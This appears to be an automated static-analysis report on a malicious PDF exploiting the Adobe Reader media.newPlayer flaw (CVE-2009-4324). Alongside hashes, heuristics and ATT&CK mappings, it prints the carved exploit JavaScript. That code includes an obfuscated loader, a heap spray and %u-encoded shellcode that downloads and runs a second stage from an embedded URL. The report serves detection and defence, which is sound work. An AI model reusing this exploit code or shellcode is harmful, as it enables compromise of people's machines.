Malicious PDF — malware analysis report

Static analysis result for SHA-256 f416e724031679da…

MALICIOUS

PDF

46.2 KB First seen: 2026-05-10
MD5: 2f87d17862a740e36b1cb1107894a49d SHA-1: c0798ed99883bff6691b73bab43349081c2444f3 SHA-256: f416e724031679da66fa0d3ad2b6158156fd7e969513cf8c36ffd5366757077c
150 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains embedded JavaScript that leverages the CVE-2009-4324 vulnerability via the media.newPlayer API. This script is designed to download and execute a second-stage payload from the URL http://splo.in/x/p.php?e=8&&. The ML classifier strongly indicates maliciousness, and the exploit technique is well-defined.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://splo.in/x/p.php?e=8&& Referenced by PDF JavaScript

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0x1E7 2578 bytes
SHA-256: b6444aa3e8f1aac4afe3569f1f2f42b252d328a535e0b7278a6e86278d1d8302
Preview script
First 1,000 lines of the extracted script
var ppp = ""+"%";
var ppp2 = ""+"a";
function sddswww3323232ew(iii9d99999999iii)
{
if(iii9d99999999iii ==1/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+ /*iii9d99999999iii*/    app["v"+"ie"/*iii9d99999999iii*/+""/*iii9d99999999iii*/+"werTy"+app.doc["U"+""+"RL"][3]+"e"][1] /*iii9d99999999iii*/  );
if(iii9d99999999iii ==2/*iii9d99999999iii*/) return (  /*iii9d99999999iii*/ ""+  /*iii9d99999999iii*/  ppp    /*iii9d99999999iii*/  );
if(iii9d99999999iii ==3/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+  /*iii9d99999999iii*/      ppp2 /*iii9d99999999iii*/);
}

var /*iii9d99999999iii*/vOMKWABITK77/*iii9d99999999iii*/ = /*iii9d99999999iii*/this/*iii9d99999999iii*/; /*iii9d99999999iii*/

var BoRfThvqiP89 =["",sddswww3323232ew(1),sddswww3323232ew(2),sddswww3323232ew(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iii9d99999999iii*/

var /*iii9d99999999iii*/vOMKWABITK77z/*iii9d99999999iii*/ =/*iii9d99999999iii*/ app/*iii9d99999999iii*/; /*iii9d99999999iii*/
var OdUEQvQtGy1 = BoRfThvqiP89[1];
/*iii9d99999999iii*/
var gqPZTKvvui3 = BoRfThvqiP89[2];
/*iii9d99999999iii*/
var ZtLjdOuRvq17 = vOMKWABITK77[OdUEQvQtGy1+"v"+BoRfThvqiP89[3]+"l"];
/*iii9d99999999iii*/
var KXcDSAYVgx18 = vOMKWABITK77[BoRfThvqiP89[13]+BoRfThvqiP89[14]+OdUEQvQtGy1+"s"+BoRfThvqiP89[8]+BoRfThvqiP89[3]+BoRfThvqiP89[15]+OdUEQvQtGy1];
/*iii9d99999999iii*/

ZtLjdOuRvq17("v"+BoRfThvqiP89[3]+"r clsuYUDfZk15 = /hi av hax"+BoRfThvqiP89[8]+"/"+BoRfThvqiP89[9]+BoRfThvqiP89[10]+";");
/*iii9d99999999iii*/
var xmXfyraldz10 = vOMKWABITK77z[/*iii9d99999999iii*/     "d"+BoRfThvqiP89[7-1]+BoRfThvqiP89[7+1]];
/*iii9d99999999iii*/
xmXfyraldz10[BoRfThvqiP89[7]+"yn"+BoRfThvqiP89[8]+"A"+BoRfThvqiP89[14]+BoRfThvqiP89[14]+"o"+BoRfThvqiP89[11]+"S"+BoRfThvqiP89[8]+BoRfThvqiP89[3]+"n"]();
/*iii9d99999999iii*/
var BILVNcRdVX4 = xmXfyraldz10[BoRfThvqiP89[10]+OdUEQvQtGy1+"tAnn"+BoRfThvqiP89[6]+BoRfThvqiP89[11]+BoRfThvqiP89[7]](0);
 /*iii9d99999999iii*/
var blECsYzdPr5 = BILVNcRdVX4[0][BoRfThvqiP89[7]+"ubj"+OdUEQvQtGy1+BoRfThvqiP89[8]+BoRfThvqiP89[11]];
  /*iii9d99999999iii*/
var FwiVVBfRwa6 = blECsYzdPr5/*iii9d99999999iii*/[BoRfThvqiP89/*iii9d99999999iii*/[11+1]+OdUEQvQtGy1+/*iii9d99999999iii*/BoRfThvqiP89[15]+"l"/*iii9d99999999iii*/+BoRfThvqiP89/*iii9d99999999iii*/[3]+BoRfThvqiP89/*iii9d99999999iii*/[8]+OdUEQvQtGy1]/*iii9d99999999iii*/(clsuYUDfZk15,gqPZTKvvui3);
/*iii9d99999999iii*/
var AxiLTvnlYJ7=KXcDSAYVgx18(KXcDSAYVgx18(FwiVVBfRwa6));
ZtLjdOuRvq17(AxiLTvnlYJ7);

if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
javascript_obj0008_001.js pdf-javascript-stream PDF /JS object 8 at offset 0x209 46806 bytes
SHA-256: e934c21a03ba5afbb68f58a414250414d189821fca2cb6916e2fe4945827fe0c
Preview script
First 1,000 lines of the extracted script
var ppp = ""+"%";
var ppp2 = ""+"a";
function sddswww3323232ew(iii9d99999999iii)
{
if(iii9d99999999iii ==1/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+ /*iii9d99999999iii*/    app["v"+"ie"/*iii9d99999999iii*/+""/*iii9d99999999iii*/+"werTy"+app.doc["U"+""+"RL"][3]+"e"][1] /*iii9d99999999iii*/  );
if(iii9d99999999iii ==2/*iii9d99999999iii*/) return (  /*iii9d99999999iii*/ ""+  /*iii9d99999999iii*/  ppp    /*iii9d99999999iii*/  );
if(iii9d99999999iii ==3/*iii9d99999999iii*/) return ( /*iii9d99999999iii*/  ""+  /*iii9d99999999iii*/      ppp2 /*iii9d99999999iii*/);
}

var /*iii9d99999999iii*/vOMKWABITK77/*iii9d99999999iii*/ = /*iii9d99999999iii*/this/*iii9d99999999iii*/; /*iii9d99999999iii*/

var BoRfThvqiP89 =["",sddswww3323232ew(1),sddswww3323232ew(2),sddswww3323232ew(3),"","","o","s","c","i","g","t","r","u","n","p"];
/*iii9d99999999iii*/

var /*iii9d99999999iii*/vOMKWABITK77z/*iii9d99999999iii*/ =/*iii9d99999999iii*/ app/*iii9d99999999iii*/; /*iii9d99999999iii*/
var OdUEQvQtGy1 = BoRfThvqiP89[1];
/*iii9d99999999iii*/
var gqPZTKvvui3 = BoRfThvqiP89[2];
/*iii9d99999999iii*/
var ZtLjdOuRvq17 = vOMKWABITK77[OdUEQvQtGy1+"v"+BoRfThvqiP89[3]+"l"];
/*iii9d99999999iii*/
var KXcDSAYVgx18 = vOMKWABITK77[BoRfThvqiP89[13]+BoRfThvqiP89[14]+OdUEQvQtGy1+"s"+BoRfThvqiP89[8]+BoRfThvqiP89[3]+BoRfThvqiP89[15]+OdUEQvQtGy1];
/*iii9d99999999iii*/

ZtLjdOuRvq17("v"+BoRfThvqiP89[3]+"r clsuYUDfZk15 = /hi av hax"+BoRfThvqiP89[8]+"/"+BoRfThvqiP89[9]+BoRfThvqiP89[10]+";");
/*iii9d99999999iii*/
var xmXfyraldz10 = vOMKWABITK77z[/*iii9d99999999iii*/     "d"+BoRfThvqiP89[7-1]+BoRfThvqiP89[7+1]];
/*iii9d99999999iii*/
xmXfyraldz10[BoRfThvqiP89[7]+"yn"+BoRfThvqiP89[8]+"A"+BoRfThvqiP89[14]+BoRfThvqiP89[14]+"o"+BoRfThvqiP89[11]+"S"+BoRfThvqiP89[8]+BoRfThvqiP89[3]+"n"]();
/*iii9d99999999iii*/
var BILVNcRdVX4 = xmXfyraldz10[BoRfThvqiP89[10]+OdUEQvQtGy1+"tAnn"+BoRfThvqiP89[6]+BoRfThvqiP89[11]+BoRfThvqiP89[7]](0);
 /*iii9d99999999iii*/
var blECsYzdPr5 = BILVNcRdVX4[0][BoRfThvqiP89[7]+"ubj"+OdUEQvQtGy1+BoRfThvqiP89[8]+BoRfThvqiP89[11]];
  /*iii9d99999999iii*/
var FwiVVBfRwa6 = blECsYzdPr5/*iii9d99999999iii*/[BoRfThvqiP89/*iii9d99999999iii*/[11+1]+OdUEQvQtGy1+/*iii9d99999999iii*/BoRfThvqiP89[15]+"l"/*iii9d99999999iii*/+BoRfThvqiP89/*iii9d99999999iii*/[3]+BoRfThvqiP89/*iii9d99999999iii*/[8]+OdUEQvQtGy1]/*iii9d99999999iii*/(clsuYUDfZk15,gqPZTKvvui3);
/*iii9d99999999iii*/
var AxiLTvnlYJ7=KXcDSAYVgx18(KXcDSAYVgx18(FwiVVBfRwa6));
ZtLjdOuRvq17(AxiLTvnlYJ7);

if(j){
function run(){util[vvv2](vvv, new Date());}
run();run();
try {this[vvv4][vvv3](null);} catch(e) {}
run();
}
endstream
endobj
7 0 obj
<<
/Length 43920
>>
stream
hi av haxc25hi av haxc30hi av haxc41hi av haxc25hi av haxc37hi av haxc36hi av haxc25hi av haxc36hi av haxc31hi av haxc25hi av haxc37hi av haxc32hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc36hi av haxc31hi av haxc25hi av haxc35hi av haxc30hi av haxc25hi av haxc36hi av haxc43hi av haxc25hi av haxc37hi av haxc35hi av haxc25hi av haxc36hi av haxc37hi av haxc25hi av haxc36hi av haxc39hi av haxc25hi av haxc36hi av haxc45hi av haxc25hi av haxc37hi av haxc33hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc33hi av haxc44hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc36hi av haxc31hi av haxc25hi av haxc37hi av haxc30hi av haxc25hi av haxc37hi av haxc30hi av haxc25hi av haxc32hi av haxc45hi av haxc25hi av haxc37hi av haxc30hi av haxc25hi av haxc36hi av haxc43hi av haxc25hi av haxc37hi av haxc35hi av haxc25hi av haxc36hi av haxc37hi av haxc25hi av haxc34hi av haxc39hi av haxc25hi av haxc36hi av haxc45hi av haxc25hi av haxc37hi av haxc33hi av haxc25hi av haxc33hi av haxc42hi av haxc25hi av haxc30hi av haxc41hi av haxc25hi av haxc36hi av haxc36hi av haxc25hi av haxc36hi av haxc46hi av haxc25hi av haxc37hi av haxc32hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc32hi av haxc38hi av haxc25hi av haxc37hi av haxc36hi av haxc25hi av haxc36hi av haxc31hi av haxc25hi av haxc37hi av haxc32hi av haxc25hi av haxc32hi av haxc30hi av haxc25hi av haxc36hi av haxc39hi av haxc25hi av haxc33hi av haxc44hi av haxc25hi av haxc33hi
... (truncated)
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0xC2D 1220 bytes
SHA-256: d7155f873b59e589a73c704be477a30cf4921d43cb2c81abc4b0960cad6f3280
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var aPlugins = app.plugIns;
for (var i=0; i < aPlugins.length; i++){
if (aPlugins[i].name=="EScript"){var lv=aPlugins[i].version;}}
if ((lv>9)&&(lv<9.3)){var j=1400;} else if((lv>8.12)&&(lv<8.2)){var j=2900;}else{}
s=new Array();
var sh = "%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u732F%u6C70%u2E6F%u6E69%u782F%u702F%u702E%u7068%u653F%u383D%u2626";
var str="%u9090%u9090";
sh=unescape(sh);str=unescape(str);
while(str.length <= 0x8000) {str+=str;}
str=str.substr(0,0x8000 - sh.length);
for(i=0;i<j;i++) {s[i]=str + sh;}
var vvv = "p@111111111111111111111111 : yyyy111";
var vvv2 = "printd";
var vvv3 = "newPlayer";
var vvv4 = "media";
legacy_pdfkit_stage_001.js deobfuscated-js cross-stage annotation API aliases at offset 0x1E7 81 bytes
SHA-256: 42025b552c7960b53abcd8cd732b01c8d109eccfdfefc352b9826c4d5807d414
Preview script
First 1,000 lines of the extracted script
media.newPlayer(null); /* alias values recovered from decoded annotation stage */

Open this report in the interactive analyzer, or submit your own file for analysis.